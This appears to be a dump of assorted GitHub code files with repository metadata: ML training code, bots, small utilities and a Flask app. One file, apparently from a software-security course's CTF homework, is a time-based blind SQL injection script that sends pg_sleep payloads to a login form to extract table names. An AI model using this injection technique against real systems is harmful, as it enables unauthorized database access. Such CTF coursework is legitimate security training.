seq_id stringlengths 4 11 | text stringlengths 113 2.92M | repo_name stringlengths 4 125 ⌀ | sub_path stringlengths 3 214 | file_name stringlengths 3 160 | file_ext stringclasses 18
values | file_size_in_byte int64 113 2.92M | program_lang stringclasses 1
value | lang stringclasses 93
values | doc_type stringclasses 1
value | stars int64 0 179k ⌀ | dataset stringclasses 3
values | pt stringclasses 78
values |
|---|---|---|---|---|---|---|---|---|---|---|---|---|
33019978477 | """ Keeps the configuration of the transcriber.
"""
class TranscriberConfig(object):
"""Provide the needed arguments for the transcriber object.
Attributes:
model_path: A string, path to the model file to load.
beam_width: Integer, decoder beam width.
lm_file_path: A string representing the path to the language model binary file.
trie_file_path: A string representing the path to the trie file build from the same vocabulary as the language model binary
lm_alpha: A float representing the alpha hyperparameter of the CTC decoder. Language Model weight.
lm_beta: A float representing the beta hyperparameter of the CTC decoder. Word insertion weight.
"""
def __init__(self, model_path, beam_width, lm_file_path, trie_file_path, lm_alpha, lm_beta) -> None:
self.model_path = model_path
self.beam_width = beam_width
self.lm_file_path = lm_file_path
self.trie_file_path = trie_file_path
self.lm_alpha = lm_alpha
self.lm_beta = lm_beta
| ivon99/CSCB634-PythonTranscriber | transcriber/transcriber_config.py | transcriber_config.py | py | 1,047 | python | en | code | 0 | github-code | 90 |
70951668778 | import re
from bot import telegram_chatbot
bot = telegram_chatbot("config.cfg")
Previous_Date = datetime.datetime.today() - datetime.timedelta(days=6)
Previous_Date_Formatted = Previous_Date.strftime ('%d/%m/%y') # format the date to dd/mm/yy
pre_date = str(Previous_Date_Formatted)
f = open("WhatsApp Chat with s3 - whatsapp summary bot.txt", "r")
def make_reply(msg):
reply = None
if msg is not None:
for x in f:
if re.search("code",x):
if re.search("^[0-9]",x):
reply = x[20:]
break
return reply
update_id = None
while True:
updates = bot.get_updates(offset=update_id)
updates = updates["result"]
if updates:
for item in updates:
update_id = item["update_id"]
try:
message = str(item["message"]["text"])
except:
message = "some exception"
from_ = item["message"]["from"]["id"]
reply = make_reply(message)
bot.send_message(reply, from_)
| bhavya4official/telegram-chatbot | server.py | server.py | py | 1,056 | python | en | code | 1 | github-code | 90 |
34047017635 | with open('editfiles/raw/editfile.csv', 'r') as file:
content = file.read()
# print(content)
# slice off trailing ;END
print(content[:-4])
cleaned_content = content[:-4]
with open('editfiles/edited/editfile_cleaned.csv', 'w') as file:
file.write(cleaned_content) | mpolinowski/python-text-processing | editfile.py | editfile.py | py | 273 | python | en | code | 0 | github-code | 90 |
34945445354 | # PasteWeb1/table_name.py
import requests
from time import time, sleep
printable_char = ''
for i in range(33, 127):
printable_char += chr(i)
offset = 0
while True:
cnt = 0
table_name = ''
while True:
cnt += 1
stop = True
for c in printable_char:
sleep(0.1)
username = "' or 1=(select 1 from pg_sleep(2) where substr((select \
table_name from information_schema.tables where table_schema='public' \
limit 1 offset " + str(offset) + "),1," + str(cnt) + ")='" \
+ table_name + c + "') --"
current_time = str(int(time()))
url = 'https://pasteweb.ctf.zoolab.org/'
data = {
'username': username,
'password': '',
'current_time': current_time
}
start_time = time()
requests.post(url, data=data)
end_time = time()
if end_time - start_time > 2:
table_name += c
stop = False
break
if stop == True:
break
print(table_name, cnt)
if len(table_name) == 0:
break
offset += 1 | YungPingXu/NYCU-Software-Security-2022 | Web/HW9/PasteWeb1/table_name.py | table_name.py | py | 1,196 | python | en | code | 0 | github-code | 90 |
42948093131 | import pdb
from logger import web_logger
from utils import (AverageMeter, accuracy, create_loss_fn,
save_checkpoint, reduce_tensor, model_load_state_dict)
from models.trans_crowd import base_patch16_384_token, base_patch16_384_gap
from data import DATASET_GETTERS
from tqdm import tqdm
from torch.utils.tensorboard import SummaryWriter
from torch.utils.data.distributed import DistributedSampler
from torch.utils.data import DataLoader, RandomSampler, SequentialSampler
from torch.optim.lr_scheduler import LambdaLR
from torch import optim
from torch.nn import functional as F
from torch import nn
from torch.cuda import amp
import argparse
import logging
import math
import os
import random
import time
import numpy as np
import torch
torch.autograd.set_detect_anomaly(True)
# import wandb
# from models.models import WideResNet, ModelEMA
logger = logging.getLogger(__name__)
parser = argparse.ArgumentParser()
parser.add_argument('--name', type=str, required=True, help='experiment name')
parser.add_argument('--data_path', default='./data',
type=str, help='data path')
parser.add_argument('--save_path', default='./checkpoint',
type=str, help='save path')
parser.add_argument('--dataset', default='cifar10', type=str,
choices=['cifar10', 'cifar100', 'crowd'], help='dataset name')
parser.add_argument('--num_labeled', type=int, default=4000,
help='number of labeled data')
parser.add_argument("--expand_labels", action="store_true",
help="expand labels to fit eval steps")
parser.add_argument('--total_steps', default=300000,
type=int, help='number of total steps to run')
parser.add_argument('--eval_step', default=1000, type=int,
help='number of eval steps to run')
parser.add_argument('--start_step', default=0, type=int,
help='manual epoch number (useful on restarts)')
parser.add_argument('--workers', default=4, type=int, help='number of workers')
# parser.add_argument('--num-classes', default=10
# type=int, help='number of classes')
parser.add_argument('--resize', default=32, type=int, help='resize image')
parser.add_argument('--batch_size', default=64,
type=int, help='train batch size')
parser.add_argument('--teacher_dropout', default=0,
type=float, help='dropout on last dense layer')
parser.add_argument('--student_dropout', default=0,
type=float, help='dropout on last dense layer')
parser.add_argument('--teacher_lr', default=0.01,
type=float, help='train learning late')
parser.add_argument('--student_lr', default=0.01,
type=float, help='train learning late')
parser.add_argument('--momentum', default=0.9, type=float, help='SGD Momentum')
parser.add_argument('--nesterov', action='store_true', help='use nesterov')
parser.add_argument('--weight_decay', default=0,
type=float, help='train weight decay')
# parser.add_argument('--ema', default=0, type=float, help='EMA decay rate')
parser.add_argument('--warmup_steps', default=0, type=int, help='warmup steps')
parser.add_argument('--student_wait_steps', default=0,
type=int, help='warmup steps')
# parser.add_argument('--grad-clip', default=1e9, type=float,
# help='gradient norm clipping')
parser.add_argument('--grad_clip', default=0., type=float,
help='gradient norm clipping')
parser.add_argument('--resume', default='', type=str,
help='path to checkpoint')
parser.add_argument('--evaluate', action='store_true',
help='only evaluate model on validation set')
parser.add_argument('--finetune', action='store_true',
help='only finetune model on labeled dataset')
parser.add_argument('--finetune_epochs', default=625,
type=int, help='finetune epochs')
parser.add_argument('--finetune_batch_size', default=512,
type=int, help='finetune batch size')
parser.add_argument('--finetune_lr', default=3e-5,
type=float, help='finetune learning late')
parser.add_argument('--finetune_weight_decay', default=0,
type=float, help='finetune weight decay')
parser.add_argument('--finetune_momentum', default=0.9,
type=float, help='finetune SGD Momentum')
parser.add_argument('--seed', default=None, type=int,
help='seed for initializing training')
# parser.add_argument('--label-smoothing', default=0,
# type=float, help='label smoothing alpha')
parser.add_argument('--mu', default=7, type=int,
help='coefficient of unlabeled batch size')
parser.add_argument('--threshold', default=0.95,
type=float, help='pseudo label threshold')
parser.add_argument('--temperature', default=1, type=float,
help='pseudo label temperature')
parser.add_argument('--lambda_u', default=1, type=float,
help='coefficient of unlabeled loss')
parser.add_argument('--uda_steps', default=1, type=float,
help='warmup steps of lambda-u')
parser.add_argument("--randaug", nargs="+", type=int,
help="use it like this. --randaug 2 10")
parser.add_argument("--amp", action="store_true",
help="use 16-bit (mixed) precision")
parser.add_argument('--world_size', default=-1, type=int,
help='number of nodes for distributed training')
parser.add_argument("--local_rank", type=int, default=-1,
help="For distributed training: local_rank")
parser.add_argument('--home', default="", type=str, help='home path')
parser.add_argument('--train_l_data', default="", type=str,
help='labeld data file full path')
parser.add_argument('--train_ul_data', default="", type=str,
help='unlabeld data file full path')
parser.add_argument('--test_l_data', default="", type=str,
help='test data file full path')
# wandb
parser.add_argument("--use_wandb", action="store_true", help="use wandb")
parser.add_argument(
"--project_name", default='2023BigDataProject', type=str, help='project name')
parser.add_argument("--description", default='initial test',
type=str, help='experiment description')
def set_seed(args):
random.seed(args.seed)
np.random.seed(args.seed)
torch.manual_seed(args.seed)
torch.cuda.manual_seed_all(args.seed)
def get_cosine_schedule_with_warmup(optimizer,
num_warmup_steps,
num_training_steps,
num_wait_steps=0,
num_cycles=0.5,
last_epoch=-1):
def lr_lambda(current_step):
if current_step < num_wait_steps:
return 0.0
if current_step < num_warmup_steps + num_wait_steps:
return float(current_step) / float(max(1, num_warmup_steps + num_wait_steps))
progress = float(current_step - num_warmup_steps - num_wait_steps) / \
float(max(1, num_training_steps - num_warmup_steps - num_wait_steps))
return max(0.0, 0.5 * (1.0 + math.cos(math.pi * float(num_cycles) * 2.0 * progress)))
return LambdaLR(optimizer, lr_lambda, last_epoch)
def get_lr(optimizer):
return optimizer.param_groups[0]['lr']
def check_nan_parameters(model):
for name, param in model.named_parameters():
if torch.isnan(param).any():
print(f"============ NaN parameter found in {name}")
def train_loop(args, labeled_loader, unlabeled_loader, test_loader, finetune_dataset,
teacher_model, student_model, avg_student_model, criterion,
t_optimizer, s_optimizer, t_scheduler, s_scheduler, t_scaler, s_scaler):
logger.info("***** Running Training *****")
logger.info(f" Task = {args.dataset}@{args.num_labeled}")
logger.info(f" Total steps = {args.total_steps}")
if args.world_size > 1:
labeled_epoch = 0
unlabeled_epoch = 0
labeled_loader.sampler.set_epoch(labeled_epoch)
unlabeled_loader.sampler.set_epoch(unlabeled_epoch)
labeled_iter = iter(labeled_loader)
unlabeled_iter = iter(unlabeled_loader)
for step in range(args.start_step, args.total_steps):
if step % args.eval_step == 0:
pbar = tqdm(range(args.eval_step),
disable=args.local_rank not in [-1, 0])
batch_time = AverageMeter()
data_time = AverageMeter()
s_losses = AverageMeter()
t_losses = AverageMeter()
t_losses_l = AverageMeter()
t_losses_u = AverageMeter()
t_losses_mpl = AverageMeter()
# mean_mask = AverageMeter()
teacher_model.train()
student_model.train()
end = time.time()
try:
images_l, targets = next(labeled_iter)
except:
if args.world_size > 1:
labeled_epoch += 1
labeled_loader.sampler.set_epoch(labeled_epoch)
labeled_iter = iter(labeled_loader)
images_l, targets = next(labeled_iter)
targets = targets.unsqueeze(1)
try:
(images_uw, images_us), _ = next(unlabeled_iter)
except:
if args.world_size > 1:
unlabeled_epoch += 1
unlabeled_loader.sampler.set_epoch(unlabeled_epoch)
unlabeled_iter = iter(unlabeled_loader)
(images_uw, images_us), _ = next(unlabeled_iter)
data_time.update(time.time() - end)
images_l = images_l.to(args.device)
images_uw = images_uw.to(args.device)
images_us = images_us.to(args.device)
targets = targets.to(args.device)
with amp.autocast(enabled=args.amp):
batch_size = images_l.shape[0]
t_images = torch.cat((images_l, images_uw, images_us))
t_logits = teacher_model(t_images)
t_logits_l = t_logits[:batch_size]
t_logits_uw, t_logits_us = t_logits[batch_size:].chunk(2)
del t_logits
t_loss_l = criterion(t_logits_l, targets)
t_loss_u = criterion(t_logits_us, t_logits_uw.detach())
weight_u = args.lambda_u * min(1., (step + 1) / args.uda_steps)
t_loss_uda = t_loss_l + weight_u * t_loss_u
s_images = torch.cat((images_l, images_us))
s_logits = student_model(s_images)
s_logits_l = s_logits[:batch_size]
s_logits_us = s_logits[batch_size:]
del s_logits
s_loss_l_old = criterion(s_logits_l.detach(), targets)
s_loss = criterion(s_logits_us, t_logits_uw.detach())
s_scaler.scale(s_loss).backward()
if args.grad_clip > 0:
s_scaler.unscale_(s_optimizer)
nn.utils.clip_grad_norm_(
student_model.parameters(), args.grad_clip)
s_scaler.step(s_optimizer)
s_scaler.update()
s_scheduler.step()
# if args.ema > 0:
# avg_student_model.update_parameters(student_model)
with amp.autocast(enabled=args.amp):
with torch.no_grad():
s_logits_l = student_model(images_l)
s_loss_l_new = criterion(s_logits_l.detach(), targets)
dot_product = s_loss_l_new - s_loss_l_old
t_loss_mpl = dot_product * \
criterion(t_logits_us, t_logits_uw.detach())
t_loss = t_loss_uda + t_loss_mpl
t_scaler.scale(t_loss).backward()
if args.grad_clip > 0:
t_scaler.unscale_(t_optimizer)
nn.utils.clip_grad_norm_(
teacher_model.parameters(), args.grad_clip)
t_scaler.step(t_optimizer)
t_scaler.update()
t_scheduler.step()
teacher_model.zero_grad()
student_model.zero_grad()
if args.world_size > 1:
s_loss = reduce_tensor(s_loss.detach(), args.world_size)
t_loss = reduce_tensor(t_loss.detach(), args.world_size)
t_loss_l = reduce_tensor(t_loss_l.detach(), args.world_size)
t_loss_u = reduce_tensor(t_loss_u.detach(), args.world_size)
t_loss_mpl = reduce_tensor(t_loss_mpl.detach(), args.world_size)
# mask = reduce_tensor(mask, args.world_size)
s_losses.update(s_loss.item())
t_losses.update(t_loss.mean().item())
t_losses_l.update(t_loss_l.item())
t_losses_u.update(t_loss_u.mean().item())
t_losses_mpl.update(t_loss_mpl.item())
# mean_mask.update(mask.mean().item())
batch_time.update(time.time() - end)
pbar.set_description(
f"Train Iter: {step+1:3}/{args.total_steps:3}. "
f"LR: {get_lr(s_optimizer):.4f}. Data: {data_time.avg:.2f}s. "
f"Batch: {batch_time.avg:.2f}s. S_Loss: {s_losses.avg:.4f}. "
f"T_Loss: {t_losses.avg:.4f}. ")
pbar.update()
if args.local_rank in [-1, 0]:
args.writer.add_scalar("lr", get_lr(s_optimizer), step)
web_logger.log(args, {"lr": get_lr(s_optimizer)})
# wandb.log({"lr": get_lr(s_optimizer)})
args.num_eval = step // args.eval_step
# print(f"{step+1} {args.eval_step} {(step + 1) % args.eval_step}")
if (step + 1) % args.eval_step == 0:
pbar.close()
if args.local_rank in [-1, 0]:
print("==================logging")
args.writer.add_scalar(
"train/1.s_loss", s_losses.avg, args.num_eval)
args.writer.add_scalar(
"train/2.t_loss", t_losses.avg, args.num_eval)
args.writer.add_scalar(
"train/3.t_labeled", t_losses_l.avg, args.num_eval)
args.writer.add_scalar(
"train/4.t_unlabeled", t_losses_u.avg, args.num_eval)
args.writer.add_scalar(
"train/5.t_mpl", t_losses_mpl.avg, args.num_eval)
web_logger.log(args,
{"train/1.s_loss": s_losses.avg})
web_logger.log(args,
{"train/2.t_loss": t_losses.avg})
web_logger.log(args,
{"train/3.t_labeled": t_losses_l.avg})
web_logger.log(args,
{"train/4.t_unlabeled": t_losses_u.avg})
web_logger.log(args,
{"train/5.t_mpl": t_losses_mpl.avg})
test_model = avg_student_model if avg_student_model is not None else student_model
test_loss = evaluate(
args, test_loader, test_model, criterion)
args.writer.add_scalar("test/loss", test_loss, args.num_eval)
args.writer.add_scalar(
"test/loss", test_loss, args.num_eval)
web_logger.log(args, {"test/loss": test_loss})
web_logger.log(args,
{"test/loss": test_loss})
is_best = test_loss < args.best_loss
if is_best:
args.best_loss = test_loss
logger.info(f"loss: {test_loss:.2f}")
logger.info(f"best_loss: {args.best_loss:.2f}")
save_checkpoint(args, {
'step': step + 1,
'teacher_state_dict': teacher_model.state_dict(),
'student_state_dict': student_model.state_dict(),
'avg_state_dict': avg_student_model.state_dict() if avg_student_model is not None else None,
'best_loss': args.best_loss,
'teacher_optimizer': t_optimizer.state_dict(),
'student_optimizer': s_optimizer.state_dict(),
'teacher_scheduler': t_scheduler.state_dict(),
'student_scheduler': s_scheduler.state_dict(),
'teacher_scaler': t_scaler.state_dict(),
'student_scaler': s_scaler.state_dict(),
}, is_best)
if args.local_rank in [-1, 0]:
args.writer.add_scalar("result/test_loss", args.best_loss)
web_logger.log(args, {"result/test_loss": args.best_loss})
# wandb.log({"result/test_acc@1": args.best_top1})
# finetune
del t_scaler, t_scheduler, t_optimizer, teacher_model, labeled_loader, unlabeled_loader
del s_scaler, s_scheduler, s_optimizer
ckpt_name = f'{args.save_path}/{args.name}_best.pth.tar'
loc = f'cuda:{args.gpu}'
checkpoint = torch.load(ckpt_name, map_location=loc)
logger.info(f"=> loading checkpoint '{ckpt_name}'")
if checkpoint['avg_state_dict'] is not None:
model_load_state_dict(student_model, checkpoint['avg_state_dict'])
else:
model_load_state_dict(student_model, checkpoint['student_state_dict'])
finetune(args, finetune_dataset, test_loader, student_model, criterion)
return
# ref 논문 참조할것
def evaluate(args, test_loader, model, criterion):
batch_time = AverageMeter()
data_time = AverageMeter()
losses = AverageMeter()
model.eval()
test_iter = tqdm(test_loader, disable=args.local_rank not in [-1, 0])
with torch.no_grad():
end = time.time()
for step, (images, targets) in enumerate(test_iter):
if len(images.shape) == 5:
images = images.squeeze(0)
if len(images.shape) == 3:
images = images.unsqueeze(0)
images = images.float()
targets = targets.float()
data_time.update(time.time() - end)
batch_size = images.shape[0]
images = images.to(args.device)
targets = targets.to(args.device)
with amp.autocast(enabled=args.amp):
outputs = model(images)
count = torch.sum(outputs).item()
loss = criterion(torch.tensor(
count).to(targets.device), targets)
# acc1, acc5 = accuracy(outputs, targets, (1, 5)) # wycho
losses.update(loss.item(), batch_size)
# pred.update(pred[0], batch_size)
batch_time.update(time.time() - end)
end = time.time()
test_iter.set_description(
f"Test Iter: {step+1:3}/{len(test_loader):3}. Data: {data_time.avg:.2f}s. "
f"Batch: {batch_time.avg:.2f}s. Loss: {losses.avg:.4f}. ")
test_iter.close()
return losses.avg
def finetune(args, finetune_dataset, test_loader, model, criterion):
model.drop = nn.Identity()
train_sampler = RandomSampler if args.local_rank == -1 else DistributedSampler
labeled_loader = DataLoader(
finetune_dataset,
batch_size=args.finetune_batch_size,
num_workers=args.workers,
pin_memory=True)
# optimizer = optim.SGD(model.parameters(),
# lr=args.finetune_lr,
# momentum=args.finetune_momentum,
# weight_decay=args.finetune_weight_decay,
# nesterov=True)
optimizer = torch.optim.Adam(model.parameters(), lr=args.finetune_lr)
scaler = amp.GradScaler(enabled=args.amp)
logger.info("***** Running Finetuning *****")
logger.info(
f" Finetuning steps = {len(labeled_loader)*args.finetune_epochs}")
for epoch in range(args.finetune_epochs):
if args.world_size > 1:
labeled_loader.sampler.set_epoch(epoch + 624)
batch_time = AverageMeter()
data_time = AverageMeter()
losses = AverageMeter()
model.train()
end = time.time()
labeled_iter = tqdm(
labeled_loader, disable=args.local_rank not in [-1, 0])
for step, (images, targets) in enumerate(labeled_iter):
images = images.float()
targets = targets.float()
data_time.update(time.time() - end)
batch_size = images.shape[0]
images = images.to(args.device)
targets = targets.to(args.device)
with amp.autocast(enabled=args.amp):
model.zero_grad()
outputs = model(images)
loss = criterion(outputs, targets)
scaler.scale(loss).backward()
scaler.step(optimizer)
scaler.update()
if args.world_size > 1:
loss = reduce_tensor(loss.detach(), args.world_size)
losses.update(loss.item(), batch_size)
batch_time.update(time.time() - end)
labeled_iter.set_description(
f"Finetune Epoch: {epoch+1:2}/{args.finetune_epochs:2}. Data: {data_time.avg:.2f}s. "
f"Batch: {batch_time.avg:.2f}s. Loss: {losses.avg:.4f}. ")
labeled_iter.close()
if args.local_rank in [-1, 0]:
args.writer.add_scalar("finetune/train_loss", losses.avg, epoch)
test_loss = evaluate(
args, test_loader, model, criterion)
args.writer.add_scalar("finetune/test_loss", test_loss, epoch)
web_logger.log(args, {"finetune/train_loss": losses.avg})
web_logger.log(args, {"finetune/test_loss": test_loss})
is_best = test_loss < args.best_loss
if is_best:
args.best_loss = test_loss
logger.info(f"loss: {test_loss:.2f}")
logger.info(f"best_loss: {args.best_loss:.2f}")
save_checkpoint(args, {
'step': step + 1,
'best_loss': args.best_loss,
'student_state_dict': model.state_dict(),
'avg_state_dict': None,
'student_optimizer': optimizer.state_dict(),
}, is_best, finetune=True)
if args.local_rank in [-1, 0]:
args.writer.add_scalar("result/finetune_loss", args.best_loss)
web_logger.log(args, {"result/finetune_loss": args.best_loss})
# wandb.log({"result/finetune_acc@1": args.best_top1})
return
def main():
args = parser.parse_args()
args.best_loss = float('inf')
if args.local_rank != -1:
args.gpu = args.local_rank
torch.distributed.init_process_group(backend='nccl')
args.world_size = torch.distributed.get_world_size()
else:
args.gpu = 0
args.world_size = 1
if args.local_rank in [-1, 0]:
args.local_time = f"{time.localtime().tm_mon:02d}{time.localtime().tm_mday:02d}{time.localtime().tm_hour:02d}{time.localtime().tm_min:02d}{time.localtime().tm_sec:02d}"
args.device = torch.device('cuda', args.gpu)
logging.basicConfig(
format="%(asctime)s - %(levelname)s - %(name)s - %(message)s",
datefmt="%m/%d/%Y %H:%M:%S",
level=logging.INFO if args.local_rank in [-1, 0] else logging.WARNING)
logger.warning(
f"Process rank: {args.local_rank}, "
f"device: {args.device}, "
f"distributed training: {bool(args.local_rank != -1)}, "
f"16-bits training: {args.amp}")
logger.info(dict(args._get_kwargs()))
if args.local_rank in [-1, 0]:
args.writer = SummaryWriter(f"results/{args.name}")
# wandb.init(name=args.name, project='MPL', config=args)
if args.seed is not None:
set_seed(args)
if args.local_rank not in [-1, 0]:
torch.distributed.barrier()
labeled_dataset, unlabeled_dataset, test_dataset, finetune_dataset = DATASET_GETTERS[args.dataset](
args)
if args.local_rank == 0:
torch.distributed.barrier()
train_sampler = RandomSampler if args.local_rank == -1 else DistributedSampler
labeled_loader = DataLoader(
labeled_dataset,
sampler=train_sampler(labeled_dataset),
batch_size=args.batch_size,
num_workers=args.workers,
drop_last=True)
unlabeled_loader = DataLoader(
unlabeled_dataset,
sampler=train_sampler(unlabeled_dataset),
batch_size=args.batch_size * args.mu,
num_workers=args.workers,
drop_last=True)
test_loader = DataLoader(test_dataset,
sampler=SequentialSampler(test_dataset),
batch_size=1,
num_workers=args.workers)
if args.dataset == "cifar10":
depth, widen_factor = 28, 2
elif args.dataset == 'cifar100':
depth, widen_factor = 28, 8
else:
depth, widen_factor = 28, 2 # wycho 수정해야함
if args.local_rank not in [-1, 0]:
torch.distributed.barrier()
# teacher_model = WideResNet(num_classes=args.num_classes,
# depth=depth,
# widen_factor=widen_factor,
# dropout=0,
# dense_dropout=args.teacher_dropout)
# student_model = WideResNet(num_classes=args.num_classes,
# depth=depth,
# widen_factor=widen_factor,
# dropout=0,
# dense_dropout=args.student_dropout)
# if args['model_type'] == 'token':
# model = base_patch16_384_token(pretrained=True)
# else:
teacher_model = base_patch16_384_token(pretrained=True)
student_model = base_patch16_384_token(pretrained=True)
if args.local_rank == 0:
torch.distributed.barrier()
# logger.info(f"Model: WideResNet {depth}x{widen_factor}")
logger.info(
f"Params: {sum(p.numel() for p in teacher_model.parameters())/1e6:.2f}M")
avg_student_model = None
# if args.ema > 0:
# avg_student_model = ModelEMA(student_model, args.ema)
criterion = create_loss_fn(args)
# t_optimizer = optim.SGD(teacher_model.parameters(),
# lr=args.teacher_lr,
# momentum=args.momentum,
# nesterov=args.nesterov)
# s_optimizer = optim.SGD(student_model.parameters(),
# lr=args.student_lr,
# momentum=args.momentum,
# nesterov=args.nesterov)
t_optimizer = torch.optim.Adam(
[ #
{'params': teacher_model.parameters(), 'lr': args.teacher_lr},
], lr=args.teacher_lr, weight_decay=args.weight_decay)
s_optimizer = torch.optim.Adam(
[ #
{'params': teacher_model.parameters(), 'lr': args.student_lr},
], lr=args.student_lr, weight_decay=args.weight_decay)
t_scheduler = get_cosine_schedule_with_warmup(t_optimizer,
args.warmup_steps,
args.total_steps)
s_scheduler = get_cosine_schedule_with_warmup(s_optimizer,
args.warmup_steps,
args.total_steps,
args.student_wait_steps)
t_scaler = amp.GradScaler(enabled=args.amp)
s_scaler = amp.GradScaler(enabled=args.amp)
# optionally resume from a checkpoint
if args.resume:
if os.path.isfile(args.resume):
logger.info(f"=> loading checkpoint '{args.resume}'")
loc = f'cuda:{args.gpu}'
checkpoint = torch.load(args.resume, map_location=loc)
args.best_loss = checkpoint['best_loss'].to(torch.device('cpu'))
if not (args.evaluate or args.finetune):
args.start_step = checkpoint['step']
t_optimizer.load_state_dict(checkpoint['teacher_optimizer'])
s_optimizer.load_state_dict(checkpoint['student_optimizer'])
t_scheduler.load_state_dict(checkpoint['teacher_scheduler'])
s_scheduler.load_state_dict(checkpoint['student_scheduler'])
t_scaler.load_state_dict(checkpoint['teacher_scaler'])
s_scaler.load_state_dict(checkpoint['student_scaler'])
model_load_state_dict(
teacher_model, checkpoint['teacher_state_dict'])
if avg_student_model is not None:
model_load_state_dict(
avg_student_model, checkpoint['avg_state_dict'])
else:
if checkpoint['avg_state_dict'] is not None:
model_load_state_dict(
student_model, checkpoint['avg_state_dict'])
else:
model_load_state_dict(
student_model, checkpoint['student_state_dict'])
logger.info(
f"=> loaded checkpoint '{args.resume}' (step {checkpoint['step']})")
else:
logger.info(f"=> no checkpoint found at '{args.resume}'")
if args.local_rank != -1:
teacher_model = nn.parallel.DistributedDataParallel(
teacher_model, device_ids=[args.local_rank],
output_device=args.local_rank, find_unused_parameters=True)
student_model = nn.parallel.DistributedDataParallel(
student_model, device_ids=[args.local_rank],
output_device=args.local_rank, find_unused_parameters=True)
if args.finetune:
del t_scaler, t_scheduler, t_optimizer, teacher_model, unlabeled_loader
del s_scaler, s_scheduler, s_optimizer
finetune(args, finetune_dataset, test_loader, student_model, criterion)
return
if args.evaluate:
del t_scaler, t_scheduler, t_optimizer, teacher_model, unlabeled_loader, labeled_loader
del s_scaler, s_scheduler, s_optimizer
evaluate(args, test_loader, student_model, criterion)
return
teacher_model = teacher_model.to(args.device)
student_model = student_model.to(args.device)
teacher_model.zero_grad()
student_model.zero_grad()
train_loop(args, labeled_loader, unlabeled_loader, test_loader, finetune_dataset,
teacher_model, student_model, avg_student_model, criterion,
t_optimizer, s_optimizer, t_scheduler, s_scheduler, t_scaler, s_scaler)
return
if __name__ == '__main__':
main()
| wonyangcho/2023bigdataproject | src/main copy.py | main copy.py | py | 30,511 | python | en | code | 0 | github-code | 90 |
75118464296 | #!/usr/bin/python3
"""Module that contains function that loads, add and also save json to file"""
import sys
save = __import__("5-save_to_json_file").save_to_json_file
load = __import__("6-load_from_json_file").load_from_json_file
filename = "add_item.json"
def main(filename):
"""Loads json, Add json to file, saves
Args:
filename: the filename
"""
listy = []
i = 1
while i < len(sys.argv):
listy.append(sys.argv[i])
i += 1
try:
temp = load(filename)
listy = list(temp) + listy
save(listy, filename)
except FileNotFoundError:
save(listy, filename)
main(filename)
| wiseman-umanah/alx-higher_level_programming | 0x0B-python-input_output/7-add_item.py | 7-add_item.py | py | 657 | python | en | code | 0 | github-code | 90 |
33663463982 | #!/usr/bin/env python
#:coding=utf-8:
from setuptools import setup, find_packages
import sys
extra = {}
if sys.version_info >= (3,):
extra['use_2to3'] = True
setup(
name='bpssl',
version='1.0.3',
description='SSL/HTTPS for Django',
long_description=open('README.rst').read() + '\n' + open('CHANGES.rst').read(),
author='Ian Lewis',
author_email='ian@beproud.jp',
url='http://bitbucket.org/beproud/bpssl/',
classifiers=[
'Development Status :: 5 - Production/Stable',
'Framework :: Django',
'Environment :: Plugins',
'Environment :: Web Environment',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 3',
'Topic :: Software Development :: Libraries :: Python Modules',
],
packages=find_packages(),
namespace_packages=[
'beproud',
'beproud.django',
],
install_requires=[
'Django>=1.2',
],
test_suite='tests.main',
**extra
)
| beproud/bpssl | setup.py | setup.py | py | 1,131 | python | en | code | 0 | github-code | 90 |
42621182883 | name = input("Enter file:")
if len(name) < 1 : name = "mbox-short.txt"
text = open(name)
book = dict()
for line in text:
line.rstrip()
if not line.startswith("From "): continue
words = line.split()
book[words[1]] = book.get(words[1],0)+1
val_order = list()
for k, v in list(book.items()):
val_order.append((v, k))
val_order.sort(reverse=True)
print(val_order[0][0], val_order[0][1])
| dzpiers/Python-For-Everybody | chapter_10-1.py | chapter_10-1.py | py | 410 | python | en | code | 0 | github-code | 90 |
9075142388 | from datetime import datetime
from flask import Flask, render_template, request
from loguru import logger
from api import backend_methods as task
from utils.other_funcs import date_now, sleep_timer
# create the Flask app
app = Flask(__name__)
@logger.catch
@app.route('/')
def index():
return render_template('index.html')
@logger.catch
@app.route('/create_tasks_first_service')
def first_service_create_tasks_sock():
return render_template('first_service_create_tasks.html')
@logger.catch
@app.route('/create_tasks_second_service')
def second_service_create_tasks_sock():
return render_template('second_service_create_tasks.html')
@logger.catch
@app.route('/create_tasks_third_service')
def third_service_create_tasks_sock():
return render_template('third_service_create_tasks.html')
@logger.catch
@app.route('/create_tasks_forth_service')
def forth_service_create_tasks_sock():
return render_template('forth_service_create_tasks.html')
@logger.catch
@app.route('/create_barcode')
def carriage_barcode_sock():
return render_template('create_barcode.html')
@logger.catch
@app.route('/load_route_list')
def load_route_list_sock():
return render_template('load_route_list.html')
@logger.catch
@app.route('/update_priority_attribute')
def update_priority_attribute_sock():
return render_template('priority_attributes.html')
@logger.catch
@app.route('/add_other_priority')
def route_article_attribute_add():
return render_template('other_attributes.html')
@logger.catch
@app.route('/receipt_creating')
def receipt_creating_rout():
return render_template('create_receipt.html')
@logger.catch
@app.route('/create_route_lists')
def create_route_lists():
_id = request.args.get('ids', '')
if '-' in _id:
_id = _id.split('-')[1]
return task.load_route_list(_id)
@logger.catch
@app.route('/add_other_priority')
def add_other_priority():
box_ids = request.args.get('box_ids', '').split(',')
attrs = {
"Type 1": request.args.get('Type 1'),
"Type 2": request.args.get('Type 2'),
"Type 3": request.args.get('Type 3'),
"Type 4": request.args.get('Type 4'),
"Type 5": request.args.get('Type 5')
}
attributes = list(
map(
lambda x: True if x == 'true' else False,
attrs.values()
)
)
if len(box_ids) > 0 and any(attributes):
return task.add_other_priority(box_ids, attrs)
else:
return (
f"Wrong format type box_ids={request.args.get('box_ids', '')}, "
f"attrs={attrs}",
400
)
@logger.catch
@app.route('/create_tasks_first_service')
def update_first_service_create_tasks():
date_time = date_now()
client_id = request.args.get('client_id', "")
local_warehouse_id = request.args.get('local_warehouse_id', "")
type_id = request.args.get('type_id', "")
client_name = request.args.get('client_name', "")
longitude = request.args.get('longitude', "")
latitude = request.args.get('latitude', "")
address = request.args.get('address', "")
boxes_count = int(request.args.get('boxes_count', ""))
if client_id == "":
return "Enter the client_id", 400
boxes = task.update_first_service_create_tasks(
boxes_count=boxes_count,
local_warehouse_id=int(local_warehouse_id),
delivery_variant_id=int(type_id),
client_name=client_name,
latitude=latitude,
longitude=longitude,
address=address
)
boxes_list = boxes["boxes"]
